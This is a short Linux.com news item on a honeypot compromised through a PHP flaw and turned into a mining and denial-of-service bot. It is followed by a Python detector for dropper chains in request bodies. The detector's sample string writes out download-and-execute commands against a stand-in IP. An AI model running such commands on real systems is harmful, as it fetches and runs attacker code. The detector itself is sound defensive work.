Linux.com


What a Successful Exploit of a Linux Server Looks Like

Like most mainstream operating systems these days, fully patched installations of Linux provide a level of security that requires a fair amount of malicious hacking to overcome. Those assurances can be completely undone by a single unpatched application, as Andre' DiMino demonstrated when he documented an Ubuntu machine in his lab being converted into a Bitcoin-mining, denial-of-service-spewing, vulnerability-exploiting hostage under the control of attackers.

A security researcher with George Washington University, DiMino noticed several IP addresses attempting to hijack the Linux server by exploiting a now-patched PHP flaw that gave attackers the ability to remotely execute commands on vulnerable machines. DiMino was curious to know what the people behind the attacks intended to do with his machine, so he set up a "honeypot" box that, for research purposes, ran an older version of the Web development language.

The attackers' HTTP POST request contained a variety of commands that in short order downloaded a Perl script disguised as a PDF document file, executed it, and then deleted it. To ensure success, the attackers repeated the steps using curl, fetch, and lwp-get requests. The Perl script was programmed to sleep for periods of time, presumably to prevent administrators from noticing anything amiss. Eventually, the compromised machine connected to an Internet Relay Chat channel, where it downloaded another script and executed it. DiMino then ran forensic software and snapped lots of screenshots so everyone could follow along.
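The download, execute, delete sequence described above can be hunted for in logged request bodies. The following is an added detection sketch, not code from the article or from DiMino's analysis; the sample bodies, the file name `a.pdf`, the documentation-range IP address, the `wget` entry and the non-Perl interpreters are all assumptions.

```python
import posixpath
import re
from urllib.parse import unquote_plus, urlparse

# curl, fetch and lwp-get are named in the article; wget is an assumption.
FETCHERS = r"(?:curl|fetch|lwp-get|wget)"
# The article only mentions Perl; the other interpreters are assumptions.
INTERPRETERS = r"(?:perl|sh|bash|python|php)"
DECOY_EXTS = {".pdf", ".jpg", ".png", ".gif", ".txt"}  # constructed list
TOKEN = r"[^\s;|&\"')]+"
FETCH_RE = re.compile(rf"\b({FETCHERS})\b([^;|&\n]*?)(https?://{TOKEN})([^;|&\n]*)")

def analyze_body(body):
    """Group fetch/execute/delete stages in a request body by dropped file name."""
    text = unquote_plus(body)
    findings = {}
    for m in FETCH_RE.finditer(text):
        tool, before, url, after = m.groups()
        # An explicit -o/-O output name wins over the URL's last path component.
        out = re.search(rf"-[oO]\s+({TOKEN})", before + " " + after)
        name = out.group(1) if out else posixpath.basename(urlparse(url).path)
        if not name:
            continue
        f = findings.setdefault(name, {"file": name, "fetchers": [],
                                       "interpreter": None, "removed": False})
        f["fetchers"].append(tool)
        f["decoy_extension"] = posixpath.splitext(name)[1].lower() in DECOY_EXTS
        target = rf"(?:\S*/)?{re.escape(name)}(?![\w.])"
        run = re.search(rf"\b({INTERPRETERS})\s+{target}", text[m.end():])
        if run:
            f["interpreter"] = run.group(1)
            tail = text[m.end() + run.end():]
            gone = re.search(rf"\brm\b[^;|&\n]*{re.escape(name)}", tail)
            f["removed"] = f["removed"] or bool(gone)
    return sorted(findings.values(), key=lambda f: f["file"])

def is_dropper_chain(finding):
    """True when a fetched file is run by an interpreter and then deleted."""
    return finding["interpreter"] is not None and finding["removed"]

# Constructed request bodies (documentation-range IP, hypothetical file names).
SUSPICIOUS = ("cd /tmp; wget http://203.0.113.7/a.pdf; perl a.pdf; rm -f a.pdf; "
              "curl -O http://203.0.113.7/a.pdf; perl a.pdf; rm -f a.pdf; "
              "fetch http://203.0.113.7/a.pdf; perl a.pdf; rm -f a.pdf; "
              "lwp-get http://203.0.113.7/a.pdf; perl a.pdf; rm -f a.pdf")
BENIGN = "comment=Please+fetch+the+report+from+https://example.org/report.pdf+today"

if __name__ == "__main__":
    for body in (SUSPICIOUS, BENIGN):
        for finding in analyze_body(body):
            print(is_dropper_chain(finding), finding)
```

A document extension handed to an interpreter and the same file being pulled by several download tools in a row are the two signals worth alerting on; the benign body shows that the word "fetch" next to a URL does not trigger on its own.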


Read more at Ars Technica
 
